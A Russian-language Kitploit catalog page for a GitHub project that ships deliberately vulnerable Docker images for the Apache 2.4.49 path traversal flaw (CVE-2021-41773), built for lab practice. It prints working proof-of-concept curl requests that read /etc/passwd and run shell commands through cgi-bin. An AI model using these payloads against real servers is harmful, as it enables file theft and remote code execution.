Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/blueteamsteve/cve-2021-41773
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubblueteamsteve/cve-2021-41773

CVE-2021-41773

Уязвимые образы Docker для CVE-2021-41773

Репозиторий
23824 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимые docker-образы для CVE-2021-41773 обход пути Apache

Эта уязвимость только применяется к версии 2.4.49, которая имеет определенные нестандартные конфигурации. В определенных ситуациях это может привести к чтению файлов или выполнению кода.

tweet https://twitter.com/ptswarm/status/1445376079548624899

Уязвимая конфигурация для чтения файлов

Контейнеры можно получить напрямую из Docker Hub с помощью

docker pull blueteamsteve/cve-2021-41773:no-cgid

и запустить с помощью

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Журналы Apache можно просмотреть с помощью команды ниже, или просто исключить флаг "-dit" из указанной выше команды запуска для потоковой передачи stdio docker logs <container-id>

PoC для чтения файлов

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Уязвимая конфигурация RCE

Контейнеры можно получить напрямую из Docker Hub с помощью

docker pull blueteamsteve/cve-2021-41773:with-cgid

и запустить с помощью

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Журналы Apache можно просмотреть с помощью команды ниже, или просто исключить флаг "-dit" из указанной выше команды запуска для потоковой передачи stdio docker logs <container-id>

PoC для RCE

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

Создание собственных docker-контейнеров

Изменяйте и создавайте свои версии, используя dockerfile и шаблонные файлы httpd.conf в подкаталогах

  • Используйте ./no-cgi для конфигурации, уязвимой к чтению файлов
  • Используйте ./with-cgi для конфигурации, уязвимой к выполнению кода
Скачать инструмент